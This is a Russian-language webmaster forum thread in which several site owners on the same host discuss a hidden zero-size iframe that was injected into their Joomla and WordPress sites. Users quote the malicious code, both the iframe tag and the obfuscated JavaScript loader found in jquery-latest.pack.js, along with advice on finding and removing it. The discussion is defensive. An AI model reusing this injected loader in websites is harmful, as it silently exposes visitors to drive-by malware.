Яндекс нашел вирус на сайте

medik777
На сайте с 29.07.2012
Offline
15
#21

Бэкапы я делаю постоянно, поэтому проблем не вижу. Просто спрашиваю как с хостером поступать.

NewMoneyMaker я нашёл чисто случайно, внизу сайта справа, был какой то квадратик в 1px, я его в исходном коде не нашёл, но если нажать на него через: "проинспектировать элемент" в браузере-opera, то там видно его код, iframe, в коде сайта я его не нашёл, поэтому буду из бэкапа восстанавливать.

M
На сайте с 14.08.2012
Offline
51
#22
medik777:
Бэкапы я делаю постоянно, поэтому проблем не вижу. Просто спрашиваю как с хостером поступать.
NewMoneyMaker я нашёл чисто случайно, внизу сайта справа, был какой то квадратик в 1px, я его в исходном коде не нашёл, но если нажать на него через: "проинспектировать элемент" в браузере-opera, то там видно его код, iframe, в коде сайта я его не нашёл, поэтому буду из бэкапа восстанавливать.

бэкап делаете самостоятельно или у хостера просите? как лучше

TF-Studio
На сайте с 17.08.2010
Offline
334
#23

самостоятельно надо всё делать.

В обычных панелях (ISP и прочие) это есть.

На удаленный FTP грузим и всё гут.

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
sdiev
На сайте с 06.07.2010
Offline
90
#24
medik777:
у меня тоже такой фрейм(
<iframe name="ifn2i8N" src="http://asnem.listen-it.com/" style="width: 0px; height: 0px;"/>
в папках шаблона я его особо не нашёл. как он мог попасть на сайта? пароли постоянно меняю(параноя), админку врядли могли взломать, так как там фишка есть одна, я бы сразу заметил. может через хостера? хостинг ********.net, на всех сайтах что у них, появились эти говнючие фреймы.

---------- Добавлено 07.08.2013 в 09:20 ----------

хостинг: хостлайф

Аналогично, тоже на Хостлайф заразилось 2 проекта, код такой же... один сайт на Joomla, второй сайт рботает на платном зарубежном движке(

secline
На сайте с 25.10.2012
Offline
18
#25
medik777:
у меня тоже такой фрейм(
<iframe name="ifn2i8N" src="http://asnem.listen-it.com/" style="width: 0px; height: 0px;"/>
в папках шаблона я его особо не нашёл. как он мог попасть на сайта? пароли постоянно меняю(параноя), админку врядли могли взломать, так как там фишка есть одна, я бы сразу заметил. может через хостера? хостинг ********.net, на всех сайтах что у них, появились эти говнючие фреймы.

---------- Добавлено 07.08.2013 в 09:20 ----------

хостинг: хостлайф

Вот тоже самое) Хостер хостлайф, сервер в германии.

Система Joomla, 2.5.11, они отключили автоматическое обновление(php.ini директива), и поэтому я незнал когда выходят обновления системы и модулей с плагинами, в итоге не обновил систему и 4 плагина были устаревшими

Зловред появился сегодня.

media/joomgallery/js/thickbox3/js/jquery-latest.pack.js

файл увеличился в размере, почему и пришлось ковырять его, самое что обидное дата изменения не изменилась, может в хостере проблема нашем? 2 случай за 1.5 года такой, первй случай был, тогда в .htaccess проблема была, как я понял и тогда проблема была в хостере, массово потому что было у них.

Вот мой фрейм.

var ******= document.createElement('iframe');******.name = '******';******.src = 'http://asnem.listen-it.com/';******.style.width = '0px';ifSxrxK.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('******=') == -1) { document.getElementsByTagName('body')[0].appendChild(******); document.cookie = '******=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}};


---------- Добавлено 07.08.2013 в 19:55 ----------

Ребята кто найдет файл с фреймом посмотрите пожалуйста дату изменения.

media/joomgallery/js/thickbox3/js/jquery-latest.pack.js мой файл пишет что изменен 18 мая 2013 года. 91742 байта - размер зараженного файла.

Тот же самый файл только вчерашний, дата 18 мая 2013 года. 91342 байта

Даже если взять месячной давности бекап, все тоже самое.

А изменение файла произошло именно сегодня, т.к скрипты шлют отчеты каждый день об измененных файлах, а их у меня 3 разных скрипта, все 3 и прислали отчет о новом или изменившимся файле.

Сам хостинг мне очень нравится, уже 1.5 года почти с ними, очень быстро работает, особенно после замены оборудования в этом году помоему, не хочется от них уходить. Хостеру отписался от данной теме, описал подробно свою проблему, надеюсь выяснят в чем проблема.

А найти зловред, учитывая что не только у меня этот сайт засветился asnem.listen-it.com, лучше всего поиском этой строки во всех файлах аккаунта, в тотал коммандере.

deea
На сайте с 25.05.2009
Offline
37
#26
medik777:
у меня тоже такой фрейм(
<iframe name="ifn2i8N" src="http://asnem.listen-it.com/" style="width: 0px; height: 0px;"/>
в папках шаблона я его особо не нашёл. как он мог попасть на сайта? пароли постоянно меняю(параноя), админку врядли могли взломать, так как там фишка есть одна, я бы сразу заметил. может через хостера? хостинг ********.net, на всех сайтах что у них, появились эти говнючие фреймы.

---------- Добавлено 07.08.2013 в 09:20 ----------

хостинг: хостлайф

********.net, сайт на WP, вредоносный код wp-includes/js/jquery/jquery.js

кстати, это второй раз, когда взламывают сайт на этом хостинге.

скажу-ка я хостлайф гудбай!

TF-Studio
На сайте с 17.08.2010
Offline
334
#27

Большая просьба у кого сайты взломаны!

только где фрейм подключен.

Его не видно, найти можно через firebug

Скиньте мне данные в личку, а именно:

- сайт

- хостинг

- движек (версия)

- установленные модули

- уровень сложности пароля (количество символов + есть ли спец символы, буквы/цифры, верхний/нижний регистр)

sdiev
На сайте с 06.07.2010
Offline
90
#28
secline:

Хостеру отписался от данной теме, описал подробно свою проблему, надеюсь выяснят в чем проблема.

Что хостер ответил? а то я фрейм удалил, а он через несколько часов опять появился, только теперь домен поменялся.

NM
На сайте с 18.02.2011
Offline
184
#29
TF-Studio:
Его не видно, найти можно через firebug

TF-Studio, каким образом через firebug можно его увидеть?

Еще пока не уверен на 100%, но кажется у меня iframe

https://clck.ru/37jxNm пытаюсь здесь отбить просадку в РСЯ Распродажа сайтов https://docs.google.com/spreadsheets/d/1m63GJQUZMrrhTxT2aoAQBX_722Kte2PfvTQEON_SgGE/
medik777
На сайте с 29.07.2012
Offline
15
#30

Вообщем, я ухожу от этого хостера, завтра буду бэкапы на новый ставить. Думаю всё норм будет.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий